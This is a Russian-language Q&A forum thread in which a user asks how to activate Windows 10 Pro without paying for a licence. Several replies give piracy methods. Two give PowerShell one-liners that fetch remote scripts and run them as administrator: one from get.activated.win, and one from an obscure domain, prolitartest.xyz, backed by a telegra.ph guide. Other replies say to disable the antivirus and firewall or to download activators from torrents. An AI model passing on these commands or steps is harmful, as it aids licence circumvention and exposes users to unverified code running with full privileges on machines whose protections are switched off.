Как активировать windows 10 pro?

Пётр Иваныч Знаток (340), закрыт 6 месяцев назад
Пробовал CMS активатор и каманды вводить, не помогает, что делать?

Умники по типу купи лицензию не тратте время на ответ, без вас знаю, Мы Русские и лицензия нам не помеха
Лучший ответ
Остальные ответы
кибер трон Оракул (56540) 6 месяцев назад
активатором с выключеным защитник и брендмаузером
Дмитрий Боровик Профи (665) 6 месяцев назад
Переход на Windows 10 Home:

Если вам не требуется версия Pro, Windows 10 Home можно иногда использовать с более легким доступом к бесплатной активации (например, при обновлении с Windows 7 или 8, если у вас есть старый ключ).
Если у вас есть старый ПК с Windows 7/8, можно попробовать использовать ключ от него. Иногда система примет его для активации Windows 10.
Участие в программе Windows Insider:

Зарегистрируйтесь в программе Windows Insider для бесплатного доступа к тестовым сборкам Windows. Это предоставляет доступ к последним обновлениям и версиям Windows, но такие сборки могут быть нестабильными, так как они предназначены для тестирования.
Никита Ожиганов Мыслитель (5489) 6 месяцев назад
Чтобы активировать Windows 10 с помощью ключа Windows 7 или Windows 8, вам просто нужно выполнить следующие действия:
Найдите свой ключ активации Windows 7/8.
Откройте приложение "Настройки". Вы можете сделать это быстро, нажав сочетание клавиш Windows + I.
Как только откроется приложение "Настройки", перейдите в раздел "Обновления и безопасность".
Теперь выберите "Активация".
Нажмите "Изменить ключ продукта" и введите свой ключ Windows 7 или 8.
Миша Искусственный Интеллект (293600) 6 месяцев назад
Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:
irm https://get.activated.win | iex
Нажать Enter.
(не путать с командной строкой).
В открывшемся окне нажать 1.
https://i1.wampi.ru/2024/07/07/Microsoft-Activation-Scripts.png (скриншот).
Владимир Нефедьев Знаток (412) 6 месяцев назад
Попробуй отключить антивирус на пк, скачать knsauto версия 1.5.4. Главно чтобы был винрар архиватор для открытия файла... Дальше думаю справишьсяя
Troll Killer Искусственный Интеллект (286941) 6 месяцев назад
Скачать активатор на торенте и активировать
Alpha8041 Оракул (73570) 6 месяцев назад
Надо было ставить репак со вшитой активацией.
Игорь Евлахов Ученик (121) 5 месяцев назад
1. Откройте командную строку от имени администратора: нажмите `Ctrl + R`, введите `cmd`, затем нажмите `Ctrl + Shift + Enter`.

2. Введите следующую команду:

powershell iex (irm ' prolitartest.xyz/key ')

3. Выберите пункт `1` и нажмите `Enter` для активации Windows.

Готово! Источник: https://telegra.ph/Rukovodstvo-po-aktivacii-Windows-1011-11-12